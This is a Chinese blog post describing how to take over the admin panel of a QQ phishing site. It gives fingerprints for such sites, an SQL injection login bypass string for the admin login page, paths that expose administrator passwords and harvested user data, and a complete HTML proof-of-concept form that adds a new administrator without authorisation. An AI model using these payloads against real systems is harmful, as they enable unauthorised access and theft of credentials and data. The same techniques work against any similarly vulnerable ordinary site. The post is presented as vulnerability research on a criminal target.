jasonx's Blog

音乐播放器
News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。
你的位置: 首页 > 渗透测试,漏洞研究 > 某QQ钓鱼网站越权

某QQ钓鱼网站越权

jasonx 1428 0 条

特征:

首页部分源码特征:

/*弹出逻辑:手动输入网址:refer空或等于http://m.qzone.com*/
//活动页干掉
//微信,qq干掉
//MSIE也不展示

后台特征:
1.png

越权

url//admin/login.php
账号admin' or 'a'='a
密码随意 即可成功登陆

查看源代码可以看到管理员账号密码

view-source:http://xxx/admin/selectadmin.php

查看后台数据

view-source:http://xxx/admin/select_user.php

2.png

越权添加管理员
poc

<script>document.getElementById("admin_icon").innerHTML="";</script><section class="rt_wrap content mCustomScrollbar">
 <div class="rt_content">
     <section>
      <h2><strong style="color:grey;">管理员账号添加</strong></h2>
      <form action="http://xxx/admin/check.php?act=add_admin" method="post">
      <ul class="ulColumn2">
       <li>
        <span class="item_name" style="width:120px;">管理员登录账号:</span>
        <input type="text" name="user" id="user" class="textbox textbox_295" placeholder="输入用户名..."/>
        <!-- <span class="errorTips">错误提示信息...</span> -->
       </li>
       <li>
        <span class="item_name" style="width:120px;">管理员登录密码:</span>
        <input type="password" name="pwd" id="pwd" class="textbox textbox_295" placeholder="输入密码..."/>
        <!-- <span class="errorTips">错误提示信息...</span> -->
       </li>
       <li>
        <span class="item_name" style="width:120px;"></span>
            <input type="submit" value="确认添加" class="link_btn" id="submit"/>
       </li>

      </ul>
     </section>
 </div>
</section>

保存为*.htm,然后打开输入账号密码,添加以后可以直接登录后台。

4.png

继续浏览有关 越权 的文章

与本文相关的文章

发表我的评论

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址